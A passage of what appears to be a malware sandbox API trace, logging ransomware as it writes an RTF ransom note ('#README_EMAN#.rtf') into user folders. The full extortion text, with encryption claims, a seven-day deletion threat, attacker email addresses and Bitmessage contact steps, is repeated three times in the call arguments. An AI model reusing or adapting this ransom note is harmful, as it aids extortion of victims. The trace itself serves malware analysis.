\\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nGoH\x93Ò\x14FE¶\x8a\x10Oå \x18¸a¸éP\x10úÈ\x13\n", lpUsedDefaultChar=0x0) returned 8717 [0298.956] WriteFile (in: hFile=0x27c, lpBuffer=0x248a258*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x248a258*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.957] CloseHandle (hObject=0x27c) returned 1 [0298.957] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mk\\#readme_eman#.rtf")) returned 0xffffffff [0298.957] GetLastError () returned 0x2 [0298.957] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mk\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0298.958] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.958] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.958] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x248a258, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n 